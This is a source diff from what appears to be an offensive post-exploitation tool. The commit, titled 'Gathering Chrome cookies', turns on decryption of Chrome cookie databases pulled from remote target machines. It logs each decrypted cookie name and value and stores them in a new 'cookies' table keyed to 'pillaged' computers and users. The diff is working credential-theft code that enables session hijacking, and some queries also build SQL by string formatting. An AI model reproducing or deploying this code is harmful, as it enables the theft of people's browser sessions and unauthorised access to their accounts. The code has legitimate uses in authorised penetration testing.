Gathering Chrome cookies

database.py

@@ -627,6 +627,19 @@ class database:
 					FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
 					FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
 					)''')
+		db_conn.execute('''CREATE TABLE "cookies" (
+					"id" integer PRIMARY KEY,
+					"file_path" text,
+					"name" text,
+					"value" text,
+					"expires_utc" int,
+					"target" text,
+					"type" text,
+					"pillaged_from_computerid" integer,
+					"pillaged_from_userid" integer,
+					FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
+					FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
+					)''')
 		db_conn.execute('''CREATE TABLE "dpapi_hash" (
 							"id" integer PRIMARY KEY,
 							"file_path" text,
@@ -1024,6 +1037,8 @@ class database:
 		return user_rowid
 
 	def clear_input(self,data):
+		if isinstance(data,int):
+			return data
 		if data is None:
 			data = ''
 		result = data.replace('\x00','')
@@ -1143,6 +1158,126 @@ class database:
 
 		return None
 
+	def add_cookies(self, credz_type, credz_name, credz_value,credz_expires_utc, credz_target, credz_path , pillaged_from_computerid=None,pillaged_from_userid=None,pillaged_from_computer_ip=None,pillaged_from_username=None):
+		"""
+		Check if this credential has already been added to the database, if not add it in.
+		"""
+		user_rowid=None
+		try:
+			credz_name=self.clear_input(credz_name)
+			self.logging.debug(f"{credz_name} - {binascii.hexlify(credz_name.encode('utf-8'))}")
+			credz_value = self.clear_input(credz_value)
+			self.logging.debug(f"{credz_value} - {binascii.hexlify(credz_value.encode('utf-8'))}")
+			credz_expires_utc = self.clear_input(credz_expires_utc)
+			self.logging.debug(f"{credz_expires_utc}")
+			credz_target = self.clear_input(credz_target)
+			self.logging.debug(f"{credz_target} - {binascii.hexlify(credz_target.encode('utf-8'))}")
+			credz_path = self.clear_input(credz_path)
+			self.logging.debug(f"{credz_path} - {binascii.hexlify(credz_path.encode('utf-8'))}")
+			self.logging.debug(f"pillaged_from_computer_ip {pillaged_from_computer_ip} - {binascii.hexlify(pillaged_from_computer_ip.encode('utf-8'))}")
+			self.logging.debug(f"pillaged_from_username {pillaged_from_username}")
+
+
+			if pillaged_from_computer_ip != None:
+				with self.conn:
+					cur = self.conn.cursor()
+					cur.execute(f"SELECT * FROM computers WHERE LOWER(ip)=LOWER('{pillaged_from_computer_ip}')")
+				results = cur.fetchall()
+				if len(results)>0:
+					result=results[0]
+					pillaged_from_computerid=result[0]
+					self.logging.debug(f"[+] Resolved {pillaged_from_computer_ip} to id : {pillaged_from_computerid}")
+		except Exception as ex:
+			self.logging.error(f"Exception in add_cookie 1")
+			self.logging.debug(ex)
+
+		try:
+			if pillaged_from_username != None:
+				with self.conn:
+					cur = self.conn.cursor()
+					cur.execute(f"SELECT * FROM users WHERE LOWER(username)=LOWER('{pillaged_from_username}') AND pillaged_from_computerid={pillaged_from_computerid}")
+				results = cur.fetchall()
+				if len(results) > 0:
+					result = results[0]
+					pillaged_from_userid = result[0]
+					self.logging.debug(f"[+] Resolved {pillaged_from_username} on machine {pillaged_from_computerid} to id : {pillaged_from_userid}")
+		except Exception as ex:
+			self.logging.error(f"Exception in add_cookies 2")
+			self.logging.debug(ex)
+			pass
+		if pillaged_from_computerid == None or pillaged_from_userid == None :
+			self.logging.debug(f"[-] Missing computerId or UserId to register Cookie {credz_name} {credz_value} - {credz_target}")
+			#return None
+		try:
+			if pillaged_from_userid == None :
+				query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid"
+				parameters = {
+					"credz_name": credz_name,
+					"credz_value": credz_value,
+					"credz_expires_utc": credz_expires_utc,
+					"credz_type": credz_type, "credz_target": credz_target,
+					"pillaged_from_computerid": int(pillaged_from_computerid),
+				}
+			else:
+				query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid AND pillaged_from_userid=:pillaged_from_userid"
+				parameters = {
+					"credz_name": credz_name,
+					"credz_value": credz_value,
+					"credz_expires_utc": credz_expires_utc,
+					"credz_type": credz_type, "credz_target": credz_target,
+					"pillaged_from_computerid": int(pillaged_from_computerid),
+					"pillaged_from_userid": int(pillaged_from_userid)
+				}
+			self.logging.debug(query)
+			with self.conn:
+				cur = self.conn.cursor()
+				cur.execute(query, parameters)
+			results = cur.fetchall()
+		except Exception as ex:
+			self.logging.error(f"Exception in add_cookie 3")
+			self.logging.debug(ex)
+		try:
+			if not len(results):
+				if pillaged_from_userid == None:
+					query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :credz_path)"
+					parameters = {
+						"credz_name": credz_name,
+						"credz_value": credz_value,
+						"credz_expires_utc": credz_expires_utc,
+						"credz_target": credz_target,
+						"credz_type": credz_type,
+						"pillaged_from_computerid": int(pillaged_from_computerid),
+						"credz_path": credz_path,
+					}
+				else:
+					query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid,pillaged_from_userid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :pillaged_from_userid, :credz_path)"
+					parameters = {
+						"credz_name": credz_name,
+						"credz_value": credz_value,
+						"credz_expires_utc": credz_expires_utc,
+						"credz_type": credz_type,
+						"credz_target": credz_target,
+						"pillaged_from_computerid": int(pillaged_from_computerid),
+						"pillaged_from_userid": int(pillaged_from_userid),
+						"credz_path": credz_path,
+					}
+				self.logging.debug(query)
+				with self.conn:
+					cur = self.conn.cursor()
+					cur.execute(query, parameters)
+				user_rowid = cur.lastrowid
+				self.logging.debug(
+					f'added_cookies(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => {user_rowid}')
+			else:
+				self.logging.debug(
+					f'added_credential(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => ALREADY IN DB')
+
+		except Exception as ex:
+			self.logging.error(f"Exception in add_cookie 4")
+			self.logging.debug(ex)
+
+		return None
+
 	def get_credz_old(self, filterTerm=None, credz_type=None):
 		"""
 		Return credentials from the database.

myseatbelt.py

@@ -458,17 +458,19 @@ class MySeatBelt:
 										self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting logindata for CHROME {user.username} {localfile} {bcolors.ENDC}")
 										self.logging.debug(ex)
 							if my_blob_type == 'ChromeCookies':
-								"""
-								myChromeSecrets.cookie_path=localfile
-								user.files[longname] = {}
-								user.files[longname]['type'] = my_blob_type
-								user.files[longname]['status'] = 'encrypted'
-								user.files[longname]['path'] = localfile
-								cookies=myChromeSecrets.decrypt_chrome_CookieData()
-								user.files[longname]['secret'] = cookies
-								if cookies is not None:
-									user.files[longname]['status'] = 'decrypted'
-								"""
+								try:
+									myChromeSecrets.cookie_path=localfile
+									user.files[longname] = {}
+									user.files[longname]['type'] = my_blob_type
+									user.files[longname]['status'] = 'encrypted'
+									user.files[longname]['path'] = localfile
+									cookies=myChromeSecrets.decrypt_chrome_CookieData()
+									user.files[longname]['secret'] = cookies
+									if cookies is not None:
+										user.files[longname]['status'] = 'decrypted'
+								except Exception as ex:
+										self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting CookieData for CHROME {user.username} {localfile} {bcolors.ENDC}")
+										self.logging.debug(ex)
 
 						except Exception as ex:
 							self.logging.debug(

software/browser/chrome_decrypt.py

@@ -1,5 +1,6 @@
 import sys
 import sqlite3,os,json,base64,binascii
+from datetime import datetime,timedelta
 from lib.toolbox import bcolors
 from lib.dpapi import *
 
@@ -152,6 +153,8 @@ class CHROME_LOGINS:
 		#path = '192.168.20.141\\Users\\Administrateur.TOUF\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\'
 		try:
 			if self.cookie_path!=None:
+				self.logging.debug(f"[{self.options.target_ip}] [+] Decrypting Chrome cookie in {self.cookie_path}")
+
 				if os.path.isfile(self.cookie_path):
 					connection = sqlite3.connect(self.cookie_path)
 					with connection:
@@ -160,22 +163,31 @@ class CHROME_LOGINS:
 							'select host_key, "TRUE", path, "FALSE", expires_utc, name, encrypted_value from cookies')
 						values = v.fetchall()
 
+					self.logging.debug(f"[{self.options.target_ip}] [+] Found {len(values)} Chrome cookies")
 					for host_key, _, path, _, expires_utc, name, encrypted_value in values:
-						#self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{value},{len(value)}")
+						self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, cookie name: {name}, expire at utc :{(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
 						self.cookies[host_key]={}
 						self.cookies[host_key][name]=self.decrypt_chrome_password(encrypted_value)
-						self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{self.cookies[host_key][name]}")
+						############PROCESSING DATA
+						self.db.add_cookies(credz_type='browser-chrome',
+						                  credz_name=name,
+						                  credz_value=self.cookies[host_key][name],
+						                  credz_expires_utc=expires_utc,
+									      credz_target=host_key,
+						                  credz_path='',
+						                  pillaged_from_computer_ip=self.options.target_ip,
+						                  pillaged_from_username=self.username)
+						self.logging.info(f"[{self.options.target_ip}] [+]  {bcolors.OKGREEN}[Chrome Cookie] {bcolors.ENDC} for {host_key} {bcolors.OKBLUE}[ {name}:{self.cookies[host_key][name]} ] {bcolors.ENDC} expire time: {(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
 
 		except sqlite3.OperationalError as e:
 			e = str(e)
 			if (e == 'database is locked'):
-				print('[!] Make sure Google Chrome is not running in the background')
+				self.logging.debug(f"[{self.options.target_ip}] [!] Make sure Google Chrome is not running in the background")
 			elif (e == 'no such table: logins'):
-				print('[!] Something wrong with the database name')
+				self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database name")
 			elif (e == 'unable to open database file'):
-				print('[!] Something wrong with the database path')
-			else:
-				print(e)
+				self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database path")
+			self.logging.debug(f"[{self.options.target_ip}] {e}")
 			return None
 
 		return self.cookies